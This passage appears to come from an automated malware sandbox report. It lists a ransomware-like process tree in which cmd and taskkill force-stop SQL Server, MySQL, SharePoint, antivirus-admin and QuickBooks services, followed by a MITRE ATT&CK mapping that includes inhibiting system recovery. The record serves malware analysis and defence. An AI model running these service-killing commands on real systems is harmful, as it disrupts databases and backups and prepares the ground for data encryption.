- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM MSSQL$MICROSOFT##WID*
    3⤵
    - Kills process with taskkill
    PID:1288
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM MySQL57*
  2⤵
  PID:2668
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM MySQL57*
    3⤵
    - Kills process with taskkill
    PID:2664
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM MSSQL$KAV_CS_ADMIN_KIT*
  2⤵
  PID:1332
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM MSSQL$KAV_CS_ADMIN_KIT*
    3⤵
    PID:2324
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM MSSQLServerADHelper100*
  2⤵
  PID:1452
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM MSSQLServerADHelper100*
    3⤵
    PID:2784
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM SQLAgent$KAV_CS_ADMIN_KIT*
  2⤵
  PID:1516
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM SQLAgent$KAV_CS_ADMIN_KIT*
    3⤵
    - Kills process with taskkill
    PID:3980
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM msftesql-Exchange*
  2⤵
  PID:2560
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM msftesql-Exchange*
    3⤵
    - Kills process with taskkill
    PID:2116
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM MSSQL$MICROSOFT##SSEE*
  2⤵
  PID:2208
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM MSSQL$MICROSOFT##SSEE*
    3⤵
    PID:2152
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM MSSQL$SBSMONITORING*
  2⤵
  PID:1676
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM MSSQL$SBSMONITORING*
    3⤵
    - Kills process with taskkill
    PID:1096
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM MSSQL$SHAREPOINT*
  2⤵
  PID:1508
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM MSSQL$SHAREPOINT*
    3⤵
    PID:1264
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM MSSQLFDLauncher$SBSMONITORING*
  2⤵
  PID:1832
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM MSSQLFDLauncher$SBSMONITORING*
    3⤵
    - Kills process with taskkill
    PID:2420
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM MSSQLFDLauncher$SHAREPOINT*
  2⤵
  PID:3456
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM MSSQLFDLauncher$SHAREPOINT*
    3⤵
    PID:3832
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM SQLAgent$SBSMONITORING*
  2⤵
  PID:1656
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM SQLAgent$SBSMONITORING*
    3⤵
    - Kills process with taskkill
    PID:1288
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM SQLAgent$SHAREPOINT*
  2⤵
  PID:364
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM SQLAgent$SHAREPOINT*
    3⤵
    - Kills process with taskkill
    PID:2664
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM QBFCService*
  2⤵
  PID:3108
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM QBFCService*
    3⤵
    - Kills process with taskkill
    PID:2324
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM QBVSS*
  2⤵
  PID:2100
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM QBVSS*
    3⤵
    PID:2784
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell [System.Net.Dns]::GetHostByAddress('10.10.0.34').hostname
  2⤵
  PID:2132

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:3332

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

File Deletion

T1107

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads